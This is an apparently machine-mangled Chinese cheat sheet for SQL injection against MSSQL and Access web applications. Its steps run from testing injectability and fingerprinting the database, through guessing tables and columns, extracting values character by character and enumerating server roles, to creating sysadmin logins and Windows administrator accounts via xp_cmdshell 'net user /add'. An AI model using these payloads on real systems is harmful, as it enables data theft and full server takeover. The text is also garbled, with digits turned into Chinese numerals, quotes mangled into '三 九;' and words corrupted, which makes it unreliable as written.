一.断定 是可有注进
;and 一= 一
;and 一= 二
二.始步断定 是不是mssql
;anduser>0
三.注进参数是字符
三 九;and[查询前提 ]and 三 九; 三 九;= 三 九;
四.搜刮 时出过滤参数的
三 九;and[查询前提 ]and 三 九;% 二 五 三 九;= 三 九;
五.断定 数据库体系
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)fro妹妹sysobjects)>0access
六.猜数据库
;and(SelectCount(*)from[数据库名])>0
七.猜字段
;and(SelectCount(字段名)from数据库名)>0
八.猜字段外记载 少度
;and(selecttop 一len(字段名)from数据库名)>0
九.( 一)猜字段的ascii值(access)
;and(selecttop 一asc(mid(字段名, 一, 一))from数据库名)>0
( 二)猜字段的ascii值(mssql)
;and(selecttop 一unicode(substring(字段名, 一, 一))from数据库名)>0
一0.测试权限构造 (mssql)
;and 一=(SelectIS_SRVROLEMEMBER( 三 九;sysadmin 三 九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三 九;serveradmin 三 九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三 九;setupadmin 三 九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三 九;securityadmin 三 九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三 九;diskadmin 三 九;));--
;and 一=(SelectIS_SRVROLEMEMBER( 三 九;bulkadmin 三 九;));--
;and 一=(SelectIS_MEMBER( 三 九;db_owner 三 九;));--
一 一.加添mssql战体系 的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell 三 九;netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add 三 九;;--
;execmaster.dbo.xp_cmdshell 三 九;netuserusernamepassword/add 三 九;;--
;execmaster.dbo.xp_cmdshell 三 九;netlocalgroupadministratorsusername/add 三 九;;--